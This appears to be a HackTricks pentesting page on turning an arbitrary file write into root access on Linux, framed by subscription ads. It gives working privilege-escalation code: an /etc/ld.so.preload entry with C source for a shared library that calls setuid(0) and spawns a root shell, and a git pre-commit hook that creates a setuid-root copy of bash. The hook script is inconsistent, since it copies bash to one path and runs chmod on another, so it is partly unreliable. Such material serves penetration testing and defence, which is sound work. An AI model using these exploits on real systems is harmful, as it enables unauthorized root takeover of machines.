Arbitrary File Write to Root
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
This file behaves like
LD_PRELOAD env variable but it also works in SUID binaries.
If you can create it or modify it, you can just add a path to a library that will be loaded with each executed binary.For example:
echo "/tmp/pe.so" > /etc/ld.so.preload#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unlink("/etc/ld.so.preload");
setgid(0);
setuid(0);
system("/bin/bash");
}
//cd /tmp
//gcc -fPIC -shared -o pe.so pe.c -nostartfiles
Git hooks are scripts that are run on various events in a git repository ñlike when a commit is created, a merge... So if a privileged script or user is performing this actions frequently and it's possible to write in the
.git folder, this can be used to privesc.For example, It's possible to generate a script in a git repo in
.git/hooks so it's always executed when a new commit is created:echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/0xdf\nchown root:root /tmp/0xdf\nchmod 4777 /tmp/b' > pre-commit
chmod +x pre-commit
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
Last modified 4mo ago